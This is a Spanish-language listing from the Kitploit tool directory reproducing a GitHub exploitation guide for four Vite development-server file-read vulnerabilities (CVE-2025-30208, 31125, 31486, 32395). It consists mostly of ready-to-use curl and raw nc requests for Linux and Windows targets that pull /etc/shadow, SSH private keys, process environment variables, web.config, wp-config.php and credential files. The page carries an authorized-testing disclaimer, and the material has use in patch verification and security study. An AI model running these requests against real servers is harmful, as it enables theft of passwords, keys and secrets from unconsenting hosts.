Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-30208-31125-31486-32395 — Guía de explotación y script de detección automatizada para cuatro vulnerabilidades de lectura arbitraria de archivos en el servidor de desarrollo Vite (CVE-2025-30208/31125/31486/32395) con ejemplos para Linux y Windows. | Kitploit
Herramientas/GitHubGitHub/nkuty/cve-2025-30208-31125-31486-32395
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubnkuty/cve-2025-30208-31125-31486-32395

CVE-2025-30208-31125-31486-32395

Guía de explotación y script de detección automatizada para cuatro vulnerabilidades de lectura arbitraria de archivos en el servidor de desarrollo Vite (CVE-2025-30208/31125/31486/32395) con ejemplos para Linux y Windows.

Ver Repositorio
511hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Guía de explotación de vulnerabilidades de Vite (CVE-2025-30208/31125/31486/32395)

Este documento resume los métodos de explotación de cuatro vulnerabilidades de lectura arbitraria de archivos en el servidor de desarrollo de Vite, incluidos ejemplos para sistemas Linux y Windows. Tenga en cuenta: solo para uso en entornos de pruebas de seguridad autorizados.

Principios básicos

Estas cuatro vulnerabilidades en el servidor de desarrollo de Vite permiten a un atacante eludir la restricción server.fs.deny y leer archivos arbitrarios del servidor. Cada vulnerabilidad utiliza una técnica de omisión diferente, pero los principios básicos son similares.

Condiciones de impacto

Las cuatro vulnerabilidades requieren que se cumplan las siguientes condiciones para ser explotadas:

  1. El objetivo utiliza una versión afectada del servidor de desarrollo de Vite
  2. El servidor de desarrollo está expuesto explícitamente a la red (usando la opción de configuración --host o server.host)
  3. Para CVE-2025-32395, además se requiere que el servidor se ejecute en un entorno Node o Bun (no Deno)

Métodos de explotación

1. CVE-2025-30208 (Omisión por separador final)

Versiones afectadas: < 6.2.3, < 6.1.2, < 6.0.12, < 5.4.15, < 4.5.10

Versiones corregidas: 6.2.3, 6.1.2, 6.0.12, 5.4.15, 4.5.10

Principio de explotación: Al agregar los parámetros de consulta ?raw?? o ?import&raw?? en la URL, se elude la restricción de ruta @fs. Esto se debe a que los separadores finales (como ?) se eliminan en varios lugares, pero no se tienen en cuenta en la expresión regular de la cadena de consulta.

Ejemplo de explotación en sistemas Linux:```bash

读取任意文件

curl "http://[目标IP]:5173/@fs/etc/passwd?raw??" curl "http://[目标IP]:5173/@fs/etc/passwd?import&raw??" curl "http://[目标IP]:5173/@fs/var/log/auth.log?raw??" curl "http://[目标IP]:5173/@fs/home/[用户名]/.ssh/id_rsa?raw??"

验证漏洞是否存在

curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误 curl "http://[目标IP]:5173/@fs/etc/passwd?raw??" # 如果返回文件内容,则存在漏洞

**Ejemplo de explotación en Windows:**```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?raw??"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/Desktop/credentials.txt?raw??"
curl "http://[目标IP]:5173/@fs/C:/inetpub/wwwroot/web.config?raw??"

# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini"  # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?raw??"  # 如果返回文件内容,则存在漏洞

2. CVE-2025-31125 (bypass mediante método de importación específico)

Versiones afectadas: mismas que CVE-2025-30208

Versión corregida: misma que CVE-2025-30208

Principio de explotación: mediante el uso de métodos de importación específicos, como ?inline&import o ?raw?import, se omite la configuración server.fs.deny.

Ejemplo de explotación en Linux:```bash

读取任意文件

curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import" curl "http://[目标IP]:5173/@fs/etc/passwd?raw?import" curl "http://[目标IP]:5173/@fs/etc/shadow?inline&import" curl "http://[目标IP]:5173/@fs/proc/self/environ?inline&import"

验证漏洞是否存在

curl "http://[目标IP]:5173/@fs/etc/passwd" # 应返回403错误 curl "http://[目标IP]:5173/@fs/etc/passwd?inline&import" # 如果返回文件内容,则存在漏洞

**Ejemplo de explotación de Windows**:```bash
# 读取任意文件
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Windows/system32/drivers/etc/hosts?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Program Files/MySQL/MySQL Server 8.0/my.ini?inline&import"
curl "http://[目标IP]:5173/@fs/C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt?inline&import"

# 验证漏洞是否存在
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini"  # 应返回403错误
curl "http://[目标IP]:5173/@fs/C:/Windows/win.ini?inline&import"  # 如果返回文件内容,则存在漏洞

3. CVE-2025-31486 (Bypass de SVG y ruta relativa)

Versiones afectadas: < 6.2.5, < 6.1.4, < 6.0.14, < 5.4.17, < 4.5.12

Versiones corregidas: 6.2.5, 6.1.4, 6.0.14, 5.4.17, 4.5.12

Principio de explotación:

  1. Bypass de SVG: Mediante la adición de ?.svg?.wasm?init o el uso del encabezado sec-fetch-dest: script, se evita la verificación de restricciones en archivos .svg
  2. Bypass de ruta relativa: Aprovechando una vulnerabilidad de verificación antes de la normalización de ID, se utilizan rutas relativas (como ../../) para evitar las restricciones

Ejemplo de explotación en Linux:```bash

SVG绕过方法

curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init" curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/etc/passwd?.svg" curl "http://[目标IP]:5173/etc/nginx/nginx.conf?.svg?.wasm?init" curl "http://[目标IP]:5173/var/www/html/config.php?.svg?.wasm?init"

相对路径绕过方法

curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw" curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw" curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../var/log/auth.log?import&?raw"

验证漏洞是否存在

curl "http://[目标IP]:5173/etc/passwd" # 应返回404错误 curl "http://[目标IP]:5173/etc/passwd?.svg?.wasm?init" # 如果返回文件内容,则存在漏洞

**Ejemplo de explotación en Windows**:```bash
# SVG绕过方法
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"
curl -H "sec-fetch-dest: script" "http://[目标IP]:5173/C:/Windows/win.ini?.svg"
curl "http://[目标IP]:5173/C:/inetpub/wwwroot/web.config?.svg?.wasm?init"
curl "http://[目标IP]:5173/C:/Windows/Panther/Unattend.xml?.svg?.wasm?init"

# 相对路径绕过方法
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/win.ini?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Windows/system32/drivers/etc/hosts?import&?raw"
curl "http://[目标IP]:5173/@fs/x/x/x/vite-project/?/../../../../../C:/Users/Administrator/Desktop/credentials.txt?import&?raw"

# 验证漏洞是否存在
curl "http://[目标IP]:5173/C:/Windows/win.ini"  # 应返回404错误
curl "http://[目标IP]:5173/C:/Windows/win.ini?.svg?.wasm?init"  # 如果返回文件内容,则存在漏洞

Nota: La elusión de SVG solo es efectiva cuando el archivo es más pequeño que build.assetsInlineLimit (por defecto 4kB) y se utiliza Vite 6.0+.

4. CVE-2025-32395 (elusión de destino de solicitud no válida)

Versiones afectadas: < 6.2.6, < 6.1.5, < 6.0.15, < 5.4.18, < 4.5.13

Versiones corregidas: 6.2.6, 6.1.5, 6.0.15, 5.4.18, 4.5.13

Principio de explotación: Se aprovecha la característica de la especificación HTTP 1.1 que no permite el carácter # en request-target. En los entornos de ejecución Node y Bun, estas solicitudes no son rechazadas internamente, http.IncomingMessage.url contiene #, y Vite asume que req.url no contendrá # al comprobar server.fs.deny.

Ejemplo de explotación en Linux:```bash

使用curl的--request-target选项

curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd" "http://[目标IP]:5173" curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow" "http://[目标IP]:5173" curl --request-target "/@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../var/www/html/wp-config.php" "http://[目标IP]:5173"

或使用原始HTTP请求

echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/passwd HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173 echo -e "GET /@fs/Users/[用户名]/Desktop/vite-project/#/../../../../../etc/shadow HTTP/1.1\r\nHost: [目标IP]:5173\r\nConnection: close\r\n\r\n" | nc [目标IP] 5173

Descargar herramienta